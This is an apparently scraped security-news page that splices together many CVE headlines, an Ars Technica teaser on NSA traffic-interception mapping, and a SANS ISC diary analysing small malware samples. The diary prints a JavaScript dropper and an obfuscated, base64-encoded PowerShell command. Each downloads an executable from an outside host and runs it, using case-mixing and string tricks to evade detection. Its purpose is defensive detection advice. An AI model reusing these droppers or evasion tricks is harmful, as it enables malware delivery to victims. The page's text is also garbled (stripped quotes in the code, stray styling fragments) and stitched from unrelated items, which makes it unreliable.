util-linux CVE-2017-2616 Local Denial of Service Vulnerability
 
IBM TRIRIGA Application Platform CVE-2017-1171 Unspecified Remote Privilege Escalation Vulnerability
 
(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
 
IBM Algo One CVE-2017-1154 Unauthorized Access Vulnerability
 
Xen 'xenstore' Denial of Service Vulnerability
 
CentreCOM AR260S V2 CVE-2017-2125 Privilege Escalation Vulnerability
 

Sometimes you may find very small pieces of malicious code. Yesterday, I caught this very small Javascript sample with only 2 lines of code:

var d=new ActiveXObject(Shell.NormandApplication.replace(Normand,
d.ShellExecute(PowerShell,((New-Object System.Net.WebClient).DownloadFile(http://[redacted].exe, xwing.pifStart-Process xwing.pif,,

There is no real obfuscation here, just atrick to avoid the detection of the string Shell.Application which often searched by automated tools

Sometimes, there is no need to implement complex code to bypass detection. A good example comes withPowerShell which has the following cool padding:5px 10px"> poWERShElL.Exe -ExECutioNPolicy bYpAsS -NOPrOFiLe -WindOwsTyLe HiddEN -enCodEdCoMMANd \ IAAoAG4ARQB3AC0AbwBiAGoAZQBjAFQAIABTAHkAUwBUAGUAbQAuAE4AZQB0AC4AVwBFAGIAQwBsAG\ kARQBOAHQAKQAuAEQAbwB3AE4ATABvAGEARABGAEkAbABFACgAIAAdIGgAdAB0AHAAcwA6AC8ALwBh\ AHIAaQBoAGEAbgB0AHQAcgBhAGQAZQByAHMAbgBnAHAALgBjAG8AbQAvAGkAbQBhAGcAZQBzAC8AUw\ BjAGEAbgBfADIALgBlAHgAZQAdICAALAAgAB0gJABlAG4AdgA6AFQARQBtAFAAXABvAHUAdABwAHUA\ dAAuAGUAeABlAB0gIAApACAAOwAgAGkAbgBWAG8AawBFAC0ARQB4AFAAUgBlAHMAUwBJAG8ATgAgAB\ 0gJABFAE4AdgA6AHQARQBNAFAAXABvAHUAdABwAHUAdAAuAGUAeABlAB0g

The decoded inVokE-ExPResSIoN $ENv:tEMP\output.exe

Nothing fancy, easy to decode but this trick will bypass most of the default security controls. A good idea is to fine tune your regular expressions and filters to catch the -encodedcommand string (and ignore the case).

Note that the PE file is downloaded via HTTPS!

[1]https://blogs.msdn.microsoft.com/timid/2014/03/26/powershell-encodedcommand-and-round-trips/

Xavier Mertens (@xme)
ISC Handler - Freelance Security Consultant
PGP Key

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

 
 
Siklu EtherHaul radios CVE-2016-10308 Insecure Default Password Vulnerability
 
Multiple Trango devices CVE-2016-10307 Insecure Default Password Vulnerability
 
Trango Altum AC600 Devices CVE-2016-10306 Insecure Default Password Vulnerability
 
Multiple VMware Products CVE-2017-4903 Memory Corruption Vulnerability
 
Multiple VMware Products CVE-2017-4904 Memory Corruption Vulnerability
 
Multiple VMware Products CVE-2017-4902 Heap-Based Buffer Overflow Vulnerability
 
Microsoft Edge CVE-2016-7201 Scripting Engine Remote Memory Corruption Vulnerability
 
Multiple Flexense Products CVE-2017-7310 Buffer Overflow Vulnerability
 
Wordpress BuddyPress Plugin CVE-2017-6954 Security Bypass Vulnerability
 
Exponent CMS CVE-2016-7788 SQL Injection Vulnerability
 
MODX Revolution CMS Multiple Security Vulnerabilities
 
Apache Ambari CVE-2016-4976 Local Information Disclosure Vulnerability
 
XOOPS CVE-2017-7290 SQL Injection Vulnerability
 
Multiple Siklu EtherHaul Devices CVE-2017-7318 Remote Command Execution Vulnerability
 
RSA Archer Security Operations Management with RSA UCF Local Information Disclosure Vulnerability
 
Apache Camel CVE-2017-5643 Server Side Request Forgery Security Bypass Vulnerability
 

Enlarge

A couple of years ago, when I was investigating the UK's safest ISP, a high-ranking employee at Virgin Media told me there was no NSA or GCHQ Internet traffic interception equipment hiding within Virgin's network. He also said that, in his opinion, not much traffic interception actually occurs in the UK. I asked him why. "Because they don't need to. They'll get your data when lands in the US."

While it's not true that all Internet traffic flows through the US, the addition of a few listening posts at key Internet exchanges in Europe (London, Paris) and some in Asia (Hong Kong, Tokyo) ensure that the NSA and its Five Eyes partners can analyse and ingest the majority of international Internet traffic.

To visualise the extent of the NSA's surveillance network, IXmaps has created a tool that shows you the location of suspected Internet traffic interception points. You can input your own traceroute data, or if you're in a rush you can just bring up traceroute data from people living in the same city or using the same ISP. Then click the "layers" button and turn on NSA, AT&T/Fairview, and Verizon/Stormbrew.

Read 8 remaining paragraphs | Comments

 
Huawei TIT-AL00 CVE-2017-2735 Local Security Bypass Vulnerability
 
Ubuntu AppArmor CVE-2017-6507 Security Bypass Vulnerability
 
EMC Isilon OneFS CVE-2017-4980 Directory Traversal Vulnerability
 
Google Chrome CVE-2017-5055 Use After Free Memory Corruption Vulnerability
 
Google Chrome and Chrome OS Multiple Security Vulnerabilities
 
[security bulletin] HPESBHF03723 rev.1 - HPE Aruba ClearPass Policy Manager, using Apache Struts, Remote Code Execution
 
[security bulletin] HPESBUX03725 rev.1 - HPE HP-UX Web Server Suite running Apache, Multiple Vulnerabilities
 
Internet Storm Center Infocon Status